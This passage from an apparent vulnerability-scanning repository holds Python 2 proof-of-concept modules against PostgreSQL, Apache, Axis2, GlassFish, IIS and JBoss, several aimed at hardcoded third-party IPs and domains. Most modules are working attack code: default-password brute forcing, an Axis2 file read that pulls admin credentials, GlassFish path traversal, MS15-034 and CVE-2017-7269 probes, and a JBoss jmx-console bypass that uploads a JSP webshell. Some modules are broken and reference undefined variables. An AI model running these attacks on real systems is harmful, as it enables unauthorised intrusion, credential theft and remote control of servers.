96 | userlist=['postgres:postgres','postgres:root','postgres'],
97 | )
98 |
99 | for username,password in pass_list:
100 | if username in baduser:
101 | continue
102 | auth=getauth(s,username,password)
103 | if auth[0]=='noauth':
104 | output("postgresql://%s:%d" % (ip,port),result,'hole')
105 | return
106 | if auth[0]=="md5":
107 | if sendauth(s,auth[1]):
108 | output("postgresql://%s:%s@%s:%d" % (username,password,ip,port),result,'hole')
109 | s.close()
110 | return
111 | else:
112 | if username not in gooduser:
113 | output("postgresql user: %s@%s:%d authtype:md5" % (username,ip,port),result,'note')
114 | gooduser.append(username)
115 | if auth[0]=='auth':
116 | if username not in gooduser:
117 | output("postgresql user: %s@%s:%d authtype:%d" % (username,ip,port,auth[1]),result,'note')
118 | gooduser.append(username)
119 | if auth[0]=='baduser':
120 | baduser.append(username)
121 | s.close()
122 | s = createsocket(ip,port)
123 | except Exception,e:
124 | pass
125 | s.close()
126 |
127 |
128 | del curl
129 | return result
130 |
131 |
132 | def output(url,result,label):
133 | info = url + ' postgresql Vul '
134 | result['result']=True
135 | result['VerifyInfo'] = {}
136 | result['VerifyInfo']['type']='postgresql Vul'
137 | result['VerifyInfo']['URL'] =url
138 | result['VerifyInfo']['payload']='/root/github/poccreate/thirdparty/postgresql/postgresql_3c99590b8794b5c7ed0693e732916e92.py'
139 | result['VerifyInfo']['level']=label
140 | result['VerifyInfo']['result'] =info
141 |
142 | if __name__ == '__main__':
143 | print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')
144 |
145 |
146 |
147 | #/root/github/poccreate/thirdparty/postgresql/postgresql_3c99590b8794b5c7ed0693e732916e92.py
148 | #/root/github/poccreate/codesrc/exp-788.py
--------------------------------------------------------------------------------
/database/t.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 |
4 |
5 | class T(object):
6 | def __init__(self):
7 |
8 | self.result = {
9 | 'type': None,
10 | 'version': None,
11 | }
12 | self.keywords = []
13 | self.versions = []
14 |
15 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
16 | ##
17 | #head 返回的请求头
18 | #context 返回请求正文html代码
19 | #ip 请求ip
20 | #port 请求端口
21 | #productname 请求的组件产品
22 | #keywords 暂时已知的关键词组件
23 | #hackinfo 备用字段
24 |
25 |
26 |
27 |
28 | return True
29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
30 | result = {}
31 | result['result']=False
32 | return result
33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
34 | result = {}
35 | result['result']=False
36 | return result
37 | def parse_output(self, result):
38 | result = {}
39 | result['result']=False
40 | return result
--------------------------------------------------------------------------------
/middileware/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/__init__.py
--------------------------------------------------------------------------------
/middileware/apache/__init__.py:
--------------------------------------------------------------------------------
1 | KEYWORDS = ['apache', ]
2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
3 | return False
--------------------------------------------------------------------------------
/middileware/apache/apache_state.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 | import urllib2
3 |
4 |
5 | from t import T
6 |
7 |
8 |
9 |
10 | class P(T):
11 | def __init__(self):
12 | T.__init__(self)
13 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
14 | timeout=3
15 | target_url=''
16 | if port=='443':
17 | target_url = 'https://'+ip+':'+port
18 | else:
19 |
20 | target_url = 'http://'+ip+':'+port
21 | result = {}
22 | res=None
23 | result['result']=False
24 | vul_url = target_url + "/server-status"
25 | try:
26 | res=urllib2.urlopen(vul_url,timeout=timeout)
27 | res_html = res.read()
28 | except:
29 | return result
30 | finally:
31 | if res is not None:
32 | res.close()
33 | del res
34 | if "Server Built" in res_html:
35 | info = vul_url + " apache status Vul"
36 | result['result']=True
37 | result['VerifyInfo'] = {}
38 | result['VerifyInfo']['type']='apache status Vul'
39 | result['VerifyInfo']['URL'] =target_url
40 | result['VerifyInfo']['payload']=vul_url
41 | result['VerifyInfo']['result'] =info
42 | return result
43 | return result
44 |
45 |
46 |
47 |
48 |
49 |
50 | if __name__ == '__main__':
51 | print P().verify(ip='www.apache.org',port='80')
--------------------------------------------------------------------------------
/middileware/apache/t.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 |
4 |
5 | class T(object):
6 | def __init__(self):
7 |
8 | self.result = {
9 | 'type': None,
10 | 'version': None,
11 | }
12 | self.keywords = []
13 | self.versions = []
14 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
15 | ##
16 | #head 返回的请求头
17 | #context 返回请求正文html代码
18 | #ip 请求ip
19 | #port 请求端口
20 | #productname 请求的组件产品
21 | #keywords 暂时已知的关键词组件
22 | #hackinfo 备用字段
23 |
24 |
25 |
26 |
27 | return True
28 |
29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
30 | result = {}
31 | result['result']=False
32 | return result
33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
34 | result = {}
35 | result['result']=False
36 | return result
37 | def parse_output(self, result):
38 | result = {}
39 | result['result']=False
40 | return result
--------------------------------------------------------------------------------
/middileware/axis/__init__.py:
--------------------------------------------------------------------------------
1 | KEYWORDS = ['axis', ]
2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
3 | if 'axis2-web/images/axis_l.jpg' in context:
4 |
5 | return True
6 | else:
7 | return False
8 |
--------------------------------------------------------------------------------
/middileware/axis/axis_config_read.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 | from ..t import T
4 | import re
5 | import urllib2,requests,urllib2,json,urlparse
6 |
7 |
8 |
9 |
10 | class P(T):
11 | def __init__(self):
12 | T.__init__(self)
13 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
14 | timeout=3
15 | target_url = 'http://'+ip+':'+port
16 | payload=target_url+'/axis2/services/listServices'
17 | result = {}
18 | result['result']=False
19 | r=None
20 | res=None
21 | try:
22 | r=requests.get(url=payload,timeout=timeout)
23 | res_code = r.status_code
24 | res_html = r.text
25 | if res_code != 404:
26 | m=re.search('\/axis2\/services\/(.*?)\?wsdl">.*?<\/a>',res_html)
27 | if m.group(1):
28 | server_str = m.group(1)
29 | read_url = target_url+'/axis2/services/%s?xsd=../conf/axis2.xml'%(server_str)
30 | res = requests.get(read_url,timeout=timeout)
31 | res_html = res.read()
32 | if 'axisconfig' in res_html:
33 | info=''
34 | try:
35 | user=re.search('(.*?)<\/parameter>',res_html)
36 | password=re.search('(.*?)<\/parameter>',res_html)
37 | info = '%s Local File Inclusion Vulnerability %s:%s'%(read_url,user.group(1),password.group(1))
38 | except:
39 | pass
40 | result['result']=True
41 | result['VerifyInfo'] = {}
42 | result['VerifyInfo']['type']='Local File Inclusion Vulnerability'
43 | result['VerifyInfo']['URL'] =target_url
44 | result['VerifyInfo']['payload']=payload
45 | result['VerifyInfo']['result'] =info
46 | except Exception,e:
47 | print e.text
48 | finally:
49 | if r is not None:
50 | r.close()
51 | del r
52 | if res is not None:
53 | res.close()
54 | del res
55 | return result
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 | if __name__ == '__main__':
73 | print P().verify(ip='222.29.81.19',port='8080')
74 |
--------------------------------------------------------------------------------
/middileware/axis/axis_crackpass.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | #coding:utf-8
3 | from t import T
4 | import urllib2
5 |
6 |
7 |
8 | class P(T):
9 | def __init__(self):
10 | T.__init__(self)
11 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
12 | timeout=3
13 | target_url = 'http://'+ip+':'+port
14 | result = {}
15 | result['result']=False
16 | r=None
17 | error_i=0
18 | flag_list=['Administration Page','System Components','"axis2-admin/upload"','include page="footer.inc">','axis2-admin/logout']
19 | user_list=['axis','admin','manager','root']
20 | pass_list=['','axis','axis2','123456','12345678','password','123456789','admin123','admin888','admin1','administrator','8888888','123123','admin','manager','root']
21 | request=None
22 | res=None
23 | for user in user_list:
24 | for password in pass_list:
25 | try:
26 | login_url = target_url+'/axis2/axis2-admin/login'
27 | PostStr='userName=%s&password=%s&submit=+Login+' % (user,password)
28 | request = urllib2.Request(login_url,PostStr)
29 | res = urllib2.urlopen(request,timeout=timeout)
30 | res_html = res.read()
31 | except urllib2.HTTPError,e:
32 | print e
33 | return result
34 | except urllib2.URLError,e:
35 | print e
36 | error_i+=1
37 | if error_i >= 3:
38 | return result
39 | continue
40 |
41 | except:
42 |
43 | return result
44 | finally:
45 |
46 | if res is not None:
47 | res.close()
48 | del res
49 | for flag in flag_list:
50 | if flag in res_html:
51 | info = '%s Axis Weak password %s:%s'%(login_url,user,password)
52 |
53 | result['result']=True
54 | result['VerifyInfo'] = {}
55 | result['VerifyInfo']['type']='Axis Weak password'
56 | result['VerifyInfo']['URL'] =target_url
57 | result['VerifyInfo']['payload']=login_url
58 | result['VerifyInfo']['result'] =info
59 |
60 |
61 | return result
62 | return result
63 |
64 |
65 | if __name__ == '__main__':
66 | print P().verify(ip='222.29.81.19',port='8080')
67 |
68 |
69 |
--------------------------------------------------------------------------------
/middileware/axis/axis_info.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 | from t import T
3 | import urllib2
4 |
5 |
6 |
7 | class P(T):
8 | def __init__(self):
9 | T.__init__(self)
10 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
11 | timeout=3
12 | target_url = 'http://'+ip+':'+port
13 | result = {}
14 | result['result']=False
15 | vul_url = target_url + "/axis2/axis2-web/HappyAxis.jsp"
16 | response=None
17 | try:
18 | response=urllib2.urlopen(vul_url,timeout=timeout)
19 | res_html = response.read()
20 | except:
21 | return result
22 | finally:
23 | if response is not None:
24 | response.close()
25 | del response
26 | if "Axis2 Happiness Page" in res_html:
27 | info = vul_url + " Axis Information Disclosure"
28 | result['result']=True
29 | result['VerifyInfo'] = {}
30 | result['VerifyInfo']['type']='Axis Information Disclosure'
31 | result['VerifyInfo']['URL'] =target_url
32 | result['VerifyInfo']['payload']=vul_url
33 | result['VerifyInfo']['result'] =info
34 | return result
35 |
36 |
37 |
38 | if __name__ == '__main__':
39 | print P().verify(ip='222.29.81.19',port='8080')
--------------------------------------------------------------------------------
/middileware/axis/t.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 |
4 |
5 | class T(object):
6 | def __init__(self):
7 |
8 | self.result = {
9 | 'type': None,
10 | 'version': None,
11 | }
12 | self.keywords = []
13 | self.versions = []
14 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
15 | ##
16 | #head 返回的请求头
17 | #context 返回请求正文html代码
18 | #ip 请求ip
19 | #port 请求端口
20 | #productname 请求的组件产品
21 | #keywords 暂时已知的关键词组件
22 | #hackinfo 备用字段
23 |
24 |
25 |
26 |
27 | return True
28 |
29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
30 | result = {}
31 | result['result']=False
32 | return result
33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
34 | result = {}
35 | result['result']=False
36 | return result
37 | def parse_output(self, result):
38 | result = {}
39 | result['result']=False
40 | return result
--------------------------------------------------------------------------------
/middileware/glassfish/__init__.py:
--------------------------------------------------------------------------------
1 | KEYWORDS = ['glassfish', ]
2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
3 | if 'resource/js/cj.js|glassfish.dev.java.net' in context:
4 |
5 | return True
6 | else:
7 | return False
--------------------------------------------------------------------------------
/middileware/glassfish/glassfish_crackpass.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 | from t import T
3 | import urllib2
4 |
5 |
6 | class P(T):
7 | def __init__(self):
8 | T.__init__(self)
9 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
10 | timeout=3
11 | target_url = 'http://'+ip+':'+port
12 | result = {}
13 | result['result']=False
14 | error_i=0
15 | flag_list=['Just refresh the page... login will take over','GlassFish Console - Common Tasks','/resource/common/js/adminjsf.js">','Admin Console','src="/homePage.jsf"','src="/header.jsf"','Common Tasks','title="Logout from GlassFish']
16 | user_list=['admin']
17 | pass_list=['adminadmin','admin','glassfish','password','123456','12345678','123456789','admin123','admin888','admin1','administrator','8888888','123123','manager','root']
18 | res=None
19 | res_html=None
20 | for user in user_list:
21 | for password in pass_list:
22 | try:
23 | PostStr='j_username=%s&j_password=%s&loginButton=Login&loginButton.DisabledHiddenField=true'%(user,password)
24 | print PostStr
25 | request = urllib2.Request(target_url+'/common/j_security_check',PostStr)
26 | res = urllib2.urlopen(request,timeout=timeout)
27 | res_html = res.read()
28 | except urllib2.HTTPError,e:
29 | return result
30 | except urllib2.URLError,e:
31 | error_i+=1
32 | if error_i >= 3:
33 | return result
34 | continue
35 | except:
36 |
37 | break
38 | finally:
39 | if res is not None:
40 | res.close()
41 | del res
42 | for flag in flag_list:
43 | if flag in res_html:
44 | info = '%s/common GlassFish Weak password %s:%s'%(target_url,user,password)
45 |
46 | result['result']=True
47 | result['VerifyInfo'] = {}
48 | result['VerifyInfo']['type']='GlassFish Weak password'
49 | result['VerifyInfo']['URL'] =target_url
50 | result['VerifyInfo']['payload']=target_url+'/common/j_security_check'
51 | result['VerifyInfo']['result'] =info
52 | return result
53 |
54 | return result
55 |
56 | if __name__ == '__main__':
57 | print P().verify(ip='1.202.164.105',port='8080')
--------------------------------------------------------------------------------
/middileware/glassfish/glassfish_fileread.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 | from t import T
3 | import urllib2
4 |
5 |
6 |
7 | class P(T):
8 | def __init__(self):
9 | T.__init__(self)
10 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
11 | timeout=3
12 | target_url = 'http://'+ip+':'+port
13 | result = {}
14 | result['result']=False
15 | vul_url = target_url + "/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/"
16 | res=None
17 | try:
18 | res=urllib2.urlopen(vul_url,timeout=timeout)
19 | res_html = res.read()
20 | except Exception,e:
21 | return result
22 | finally:
23 | if res is not None:
24 | res.close()
25 | del res
26 | if "package-appclient.xml" in res_html:
27 | info = vul_url + "GlassFish File Read Vul"
28 | result['result']=True
29 | result['VerifyInfo'] = {}
30 | result['VerifyInfo']['type']='GlassFish File Read Vulnerability'
31 | result['VerifyInfo']['URL'] =target_url
32 | result['VerifyInfo']['payload']=vul_url
33 | result['VerifyInfo']['result'] =info
34 | return result
35 |
36 |
37 |
38 | if __name__ == '__main__':
39 | print P().verify(ip='1.202.164.105',port='8080')
--------------------------------------------------------------------------------
/middileware/glassfish/t.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 |
4 |
5 | class T(object):
6 | def __init__(self):
7 |
8 | self.result = {
9 | 'type': None,
10 | 'version': None,
11 | }
12 | self.keywords = []
13 | self.versions = []
14 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
15 | ##
16 | #head 返回的请求头
17 | #context 返回请求正文html代码
18 | #ip 请求ip
19 | #port 请求端口
20 | #productname 请求的组件产品
21 | #keywords 暂时已知的关键词组件
22 | #hackinfo 备用字段
23 |
24 |
25 |
26 |
27 | return True
28 |
29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
30 | result = {}
31 | result['result']=False
32 | return result
33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
34 | result = {}
35 | result['result']=False
36 | return result
37 | def parse_output(self, result):
38 | result = {}
39 | result['result']=False
40 | return result
--------------------------------------------------------------------------------
/middileware/iis/__init__.py:
--------------------------------------------------------------------------------
1 | KEYWORDS = ['iis', ]
2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
3 | if 'Microsoft-IIS' in head or 'Microsoft IIS httpd' in productname.get('productname',''):
4 |
5 | return True
6 | else:
7 | return False
--------------------------------------------------------------------------------
/middileware/iis/iis6.0_cve-2017-7269.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 | from t import T
4 | import re
5 | import urllib2,requests,urllib2,json,urlparse
6 | requests.packages.urllib3.disable_warnings()
7 |
8 | import subprocess
9 |
10 |
11 | class P(T):
12 | def __init__(self):
13 | T.__init__(self)
14 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
15 | timeout=5
16 | if int(port) == 443:
17 | protocal = "https"
18 | else:
19 | protocal = "http"
20 | target_url = protocal + "://"+ip+":"+port+'/'
21 |
22 |
23 | result = {}
24 | result['result']=False
25 |
26 | try:
27 |
28 | myout = subprocess.check_output(['curl', '--connect-timeout', '2', '--max-time', '2', '-s','-I', '-X', 'PROPFIND',target_url ])
29 | if "HTTP/1.1 411 Length Required" in myout:
30 |
31 | result['result']=True
32 | result['VerifyInfo'] = {}
33 | result['VerifyInfo']['type']='command execute Vulnerability'
34 | result['VerifyInfo']['URL'] =target_url
35 | result['VerifyInfo']['payload']= 'iis_cve-2017-7269 Vulnerability'
36 | result['VerifyInfo']['level']= 'hole'
37 | result['VerifyInfo']['result'] =r.content
38 | except Exception,e:
39 | #print '[-]error',
40 | print e.text
41 | #pass
42 | #print traceback.print_exc()
43 | finally:
44 |
45 | return result
46 |
47 |
48 |
49 | if __name__ == '__main__':
50 | print P().verify(ip='122.224.58.215',port='80')
51 |
52 |
--------------------------------------------------------------------------------
/middileware/iis/iis_shortname.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 | from t import T
4 | import re
5 | import urllib2,requests,urllib2,json,urlparse
6 | requests.packages.urllib3.disable_warnings()
7 |
8 |
9 |
10 |
11 | class P(T):
12 | def __init__(self):
13 | T.__init__(self)
14 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
15 | timeout=5
16 | if int(port) == 443:
17 | protocal = "https"
18 | else:
19 | protocal = "http"
20 | target_url = protocal + "://"+ip+":"+port
21 |
22 |
23 | result = {}
24 | result['result']=False
25 | r=None
26 | s=None
27 | try:
28 |
29 | r=requests.get(url=target_url+'/*~1****/a.aspx',timeout=timeout,allow_redirects=False)
30 | status_1=r.status_code
31 | s=requests.get(url=target_url+'/l1j1e*~1****/a.aspx',timeout=timeout,allow_redirects=False)
32 | status_2=s.status_code
33 | #print target_url
34 | if status_1 == 404 and status_2 == 400:
35 | result['result']=True
36 | result['VerifyInfo'] = {}
37 | result['VerifyInfo']['type']='iis short name Vulnerability'
38 | result['VerifyInfo']['URL'] =target_url
39 | result['VerifyInfo']['payload']= 'null'
40 | result['VerifyInfo']['level']= 'warning'
41 | result['VerifyInfo']['result'] =r.content
42 | except Exception,e:
43 | #print '[-]error',
44 | print e.text
45 | #pass
46 | #print traceback.print_exc()
47 | finally:
48 | closeitem(r)
49 | closeitem(s)
50 | return result
51 | def closeitem(instance):
52 | if instance is not None:
53 | instance.close()
54 | del instance
55 |
56 |
57 | if __name__ == '__main__':
58 | print P().verify(ip='cos.99.com',port='80')
59 |
60 |
--------------------------------------------------------------------------------
/middileware/iis/ms15_034.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 | from t import T
4 | import re
5 | import urllib2,requests,urllib2,json,urlparse
6 |
7 |
8 |
9 |
10 | class P(T):
11 | def __init__(self):
12 | T.__init__(self)
13 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
14 | timeout=3
15 | if int(port) == 443:
16 | protocal = "https"
17 | else:
18 | protocal = "http"
19 | target_url = protocal + "://"+ip+":"+str(port)
20 |
21 |
22 | result = {}
23 | result['result']=False
24 | r=None
25 |
26 | vuln_header = {"Range": "bytes=0-18446744073709551615"}
27 |
28 | try:
29 |
30 |
31 | r=requests.get(url=target_url,headers=vuln_header,timeout=timeout,verify=False,allow_redirects=False)
32 | #print r.content
33 | if "请求范围不符合" in r.content or "Requested Range Not Satisfiable" in r.content:
34 |
35 |
36 | result['result']=True
37 | result['VerifyInfo'] = {}
38 | result['VerifyInfo']['type']='iis Vulnerability'
39 | result['VerifyInfo']['URL'] =target_url
40 | result['VerifyInfo']['payload']=vuln_buffer
41 | result['VerifyInfo']['result'] =r.content
42 | except Exception,e:
43 | print e.text
44 | finally:
45 | if r is not None:
46 | r.close()
47 | del r
48 | return result
49 |
50 |
51 |
52 | if __name__ == '__main__':
53 | print P().verify(ip='202.85.212.101',port='443')
54 |
--------------------------------------------------------------------------------
/middileware/iis/t.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 |
4 |
5 | class T(object):
6 | def __init__(self):
7 |
8 | self.result = {
9 | 'type': None,
10 | 'version': None,
11 | }
12 | self.keywords = []
13 | self.versions = []
14 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
15 | ##
16 | #head 返回的请求头
17 | #context 返回请求正文html代码
18 | #ip 请求ip
19 | #port 请求端口
20 | #productname 请求的组件产品
21 | #keywords 暂时已知的关键词组件
22 | #hackinfo 备用字段
23 |
24 |
25 |
26 |
27 | return True
28 |
29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
30 | result = {}
31 | result['result']=False
32 | return result
33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
34 | result = {}
35 | result['result']=False
36 | return result
37 | def parse_output(self, result):
38 | result = {}
39 | result['result']=False
40 | return result
--------------------------------------------------------------------------------
/middileware/jboss/__init__.py:
--------------------------------------------------------------------------------
1 | KEYWORDS = ['jboss', ]
2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
3 | if 'youcandoit.jpg' in context or 'JBossWeb'in context or 'jboss' in hackinfo or 'jboss' in head :
4 | return True
5 | else:
6 | return False
--------------------------------------------------------------------------------
/middileware/jboss/jboss_crackpass.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 | from t import T
3 | import base64
4 | import re
5 | import urllib
6 | import urllib2
7 | import time,random
8 |
9 | class P(T):
10 | def __init__(self):
11 | T.__init__(self)
12 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
13 | timeout=10
14 | target_url = 'http://'+ip+':'+port
15 | result = {}
16 | result['result']=False
17 | error_i = 0
18 | flag_list=['>jboss.j2ee','JBoss JMX Management Console','HtmlAdaptor?action=displayMBeans','JBoss Management']
19 | user_list=['admin','manager','jboss','root']
20 | pass_list=['','admin','123456','12345678','123456789','admin123','admin888','password','admin1','administrator','8888888','123123','admin','manager','root','jboss']
21 | res=None
22 | res_html=None
23 | login_url=None
24 | for user in user_list:
25 | for password in pass_list:
26 | try:
27 | login_url = target_url+'/jmx-console'
28 | request = urllib2.Request(login_url)
29 | auth_str_temp=user+':'+password
30 | auth_str=base64.b64encode(auth_str_temp)
31 | request.add_header('Authorization', 'Basic '+auth_str)
32 | res = urllib2.urlopen(request,timeout=timeout)
33 | res_code = res.code
34 | res_html = res.read()
35 |
36 | except urllib2.HTTPError,e:
37 | print 1
38 | res_code = e.code
39 | res_html = e.read()
40 | except urllib2.URLError,e:
41 | error_i+=1
42 | if error_i >= 3:
43 | return result
44 | continue
45 | except :
46 | break
47 | finally:
48 | if res is not None:
49 | res.close()
50 | del res
51 | if int(res_code) == 404:
52 | break
53 | if int(res_code) == 401:
54 | continue
55 | for flag in flag_list:
56 | if flag in res_html:
57 | info='%s Jboss Weak password %s:%s'%(login_url,user,password)
58 | #login_cookie = res.headers['Set-Cookie']
59 | re = run(ip,port,timeout,'Basic '+auth_str)
60 | if re:
61 | info += re
62 | result['result']=True
63 | result['VerifyInfo'] = {}
64 | result['VerifyInfo']['type']='Jboss Weak password'
65 | result['VerifyInfo']['URL'] =target_url
66 | result['VerifyInfo']['payload']=target_url+'/jmx-console'
67 | result['VerifyInfo']['result'] =info
68 | return result
69 | for user in user_list:
70 | for password in pass_list:
71 | try:
72 | login_url = target_url+'/console/App.html'
73 | request = urllib2.Request(login_url)
74 | auth_str_temp=user+':'+password
75 | auth_str=base64.b64encode(auth_str_temp)
76 | request.add_header('Authorization', 'Basic '+auth_str)
77 | res = urllib2.urlopen(request,timeout=timeout)
78 | res_code = res.code
79 | res_html = res.read()
80 | except urllib2.HTTPError,e:
81 | res_code = e.code
82 | except urllib2.URLError,e:
83 | error_i+=1
84 | if error_i >= 3:
85 | return result
86 | continue
87 | except :
88 | break
89 | finally:
90 | if res is not None:
91 | res.close()
92 | del res
93 |
94 | if int(res_code) == 404:
95 | break
96 | if int(res_code) == 401:
97 | continue
98 | for flag in flag_list:
99 | if flag in res_html:
100 | info='%s Jboss Weak password %s:%s'%(login_url,user,password)
101 |
102 | result['result']=True
103 | result['VerifyInfo'] = {}
104 | result['VerifyInfo']['type']='Jboss Weak password'
105 | result['VerifyInfo']['URL'] =target_url
106 | result['VerifyInfo']['payload']=target_url+'/console/App.html'
107 | result['VerifyInfo']['result'] =info
108 | return result
109 | for user in user_list:
110 | for password in pass_list:
111 | try:
112 | login_url = target_url+'/admin-console/login.seam'
113 | res=urllib2.urlopen(login_url)
114 | res_html = res.read()
115 | if '"http://jboss.org/embjopr/"' in res_html:
116 | key_str=re.search('javax.faces.ViewState\" value=\"(.*?)\"',res_html)
117 | key_hash=urllib.quote(key_str.group(1))
118 | PostStr="login_form=login_form&login_form:name=%s&login_form:password=%s&login_form:submit=Login&javax.faces.ViewState=%s"%(user,password,key_hash)
119 | request = urllib2.Request(login_url,PostStr)
120 | res = urllib2.urlopen(request,timeout=timeout)
121 | if 'admin-console/secure/summary.seam' in res.read():
122 | info = "%s Jboss Weak password %s:%s"%(login_url,user,password)
123 | result['result']=True
124 | result['VerifyInfo'] = {}
125 | result['VerifyInfo']['type']='Jboss Weak password'
126 | result['VerifyInfo']['URL'] =target_url
127 | result['VerifyInfo']['payload']=target_url+'/admin-console/login.seam'
128 | result['VerifyInfo']['result'] =info
129 | except:
130 | return result
131 | finally:
132 | if res is not None:
133 | res.close()
134 | del res
135 | return result
136 |
137 | if __name__ == '__main__':
138 | print P().verify(ip='1.202.235.69',port='8080')
139 |
--------------------------------------------------------------------------------
/middileware/jboss/jboss_head_getshell.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 | from t import T
3 | import urllib2
4 | import socket
5 | import time
6 | import random
7 | def random_str(len):
8 | str1=""
9 | for i in range(len):
10 | str1+=(random.choice("ABCDEFGH"))
11 | return str1
12 |
13 | def readfile(path):
14 | data=None
15 | file_object = open(path)
16 | try:
17 | data = file_object.read( )
18 | finally:
19 | file_object.close( )
20 | return data
21 |
22 |
23 |
24 | class P(T):
25 | def __init__(self):
26 | T.__init__(self)
27 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
28 | timeout=3
29 | target_url = 'http://'+ip+':'+port
30 | result = {}
31 | result['result']=False
32 | res=None
33 | s1=None
34 | shell=''
35 | try:
36 | socket.setdefaulttimeout(timeout)
37 | s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
38 | s1.connect((ip,int(port)))
39 | import os
40 | shell=readfile(os.path.split(os.path.realpath(__file__))[0]+'/shell.jsp')
41 | #s1.recv(1024)
42 | shellcode=""
43 | name=random_str(5)
44 | for v in shell:
45 | shellcode+=hex(ord(v)).replace("0x","%")
46 | flag="HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType="+\
47 | "java.lang.String&arg0=%s.war&argType=java.lang.String&arg1=auto700&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3="%(name)+shellcode+\
48 | "&argType=boolean&arg4=True HTTP/1.0\r\n\r\n"
49 | s1.send(flag)
50 | data = s1.recv(512)
51 | s1.close()
52 | time.sleep(10)
53 | url = "http://%s:%d"%(ip,int(port))
54 | webshell_url = "%s/%s/auto700.jsp"%(url,name)
55 | res = urllib2.urlopen(webshell_url,timeout=timeout)
56 | if 'comments' in res.read():
57 | info="Jboss Authentication bypass webshell:%s"%(webshell_url)
58 | result['result']=True
59 | result['VerifyInfo'] = {}
60 | result['VerifyInfo']['type']='Jboss Authentication bypass webshell'
61 | result['VerifyInfo']['URL'] =target_url
62 | result['VerifyInfo']['payload']=webshell_url
63 | result['VerifyInfo']['result'] =info
64 | except Exception,e:
65 | print e
66 |
67 | finally:
68 | if res is not None:
69 | res.close()
70 | if s1 is not None:
71 | s1.close
72 | del shell
73 | return result
74 |
75 |
76 |
77 | if __name__ == '__main__':
78 | print P().verify(ip='1.202.164.105',port='8080')
--------------------------------------------------------------------------------
/middileware/jboss/jboss_info.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 | import urllib2
3 |
4 | from t import T
5 |
6 |
7 |
8 |
9 | class P(T):
10 | def __init__(self):
11 | T.__init__(self)
12 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
13 | timeout=3
14 | target_url = 'http://'+ip+':'+port
15 | result = {}
16 | result['result']=False
17 |
18 | vul_url = target_url + '/status?full=true'
19 | res=None
20 | try:
21 | res=urllib2.urlopen(vul_url,timeout=timeout)
22 | res_html = res.read()
23 | except:
24 | return result
25 | finally:
26 | if res is not None:
27 | res.close()
28 | if "Max processing time" in res_html:
29 | info = vul_url + " Jboss Information Disclosure"
30 | result['result']=True
31 | result['VerifyInfo'] = {}
